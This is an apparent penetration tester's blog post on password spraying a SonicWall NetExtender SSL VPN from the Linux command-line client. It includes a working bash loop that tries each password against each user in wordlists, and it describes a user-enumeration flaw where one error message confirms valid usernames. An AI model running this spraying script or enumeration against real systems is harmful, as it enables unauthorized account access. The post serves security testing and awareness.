I little while ago I got to play around with a SonicWall firewall that had NetExtender configured. NetExtender is SonicWall’s SSL VPN offering. While my initial goal was just to password spray it, I found a few interesting quirks with the NetExtender client along the way.
Since I had some past experience with SonicWall and NetExtender, I knew there was a Linux CLI client, which led me to believe it would be relatively easy to script a login with it. I downloaded the latest Linux NetExtender client, which can be found with a quick Google search, and installed it. An example of a login attempt using the bare minimum amount of info looks something like this:
netExtender -u user -p password -d LocalDomain 192.168.1.1:4433 NetExtender for Linux - Version 9.0.803 SonicWall Copyright (c) 2018 SonicWall Connecting to 192.168.1.1:4433… There is a problem with the site's security certificate. Warning: self signed certificate Do you want to proceed? (Y:Yes, N:No, V:View Certificate) Connected. Logging in… Authentication failure: Login failed - Incorrect username/password. SSL VPN logging out… Logout command failed SSL VPN connection is terminated. Exiting NetExtender client
A couple notes about the options and outputs I want to clear up first. The “Login failed” message is pretty self explanatory. The “-u” and “-p” flags should be pretty obvious. The “-d” flag is the login domain, which may be an Active Directory/LDAP back end or the local authentication service (this value is CaSe SeNsItIvE). The default local authentication domain is “LocalDomain”. The warning about a self signed certificate has to be answered, even if you import the cert on the machine. I imagine this wouldn’t be an issue if a valid cert was used. While I was a little disappointed I didn’t immediately get a successful login with user:password, I at least felt that I could script this and spray it regardless. After some trial and error, I came up with this ugly thing:
for j in `cat passwords.txt`; do for i in `cat ../users.txt`; do echo -e "\n\n ***login attempt: $i : $j ***"; echo -e "Y\n" | netExtender -u $i -p $j -d LocalDomain 192.168.1.1:4433; sleep 1; done; done
While it may be ugly and slow, it does the job. It will iterate through the list of users and attempt to log into each user with all the passwords in the list provided. I had a couple delays that would ruin the timing for input, so I added a “sleep 1” in there to help with that and may require a bit bigger of a value depending on connection speeds/reliability. Additionally, it will echo out the username and password attempted, since that isn’t echoed back in the login process itself. If I had a successful attempt, a VPN connection would succeed and just hang there, which I would hopefully catch.
After a few rounds with various user lists, I noticed the following interesting login message:
***login attempt for: user3 : password *** NetExtender for Linux - Version 9.0.803 SonicWall Copyright (c) 2018 SonicWall Connecting to 192.168.1.1:4433… There is a problem with the site's security certificate. Warning: self signed certificate Do you want to proceed? (Y:Yes, N:No, V:View Certificate) Connected. Logging in… Authentication failure: User doesn't belong to SSLVPN service group SSL VPN logging out… Logout command failed SSL VPN connection is terminated. Exiting NetExtender client
Well, it looks like we have a valid user! It won’t do us much good here since it doesn’t have permission to log in via NetExtender. I initially thought maybe the password was valid, but after a little playing around found out that the same message was returned regardless of the password value. A nice little user-enumeration.
While this may not immediately be valuable since you can’t directly use any of the enumerated users to log into NetExtender, you can always use them for other services or validate the username format. Also, while I didn’t/couldn’t test this with an Active Directory/LDAP back end, it may prove to be a handy way to enum/spray AD from an external perspective.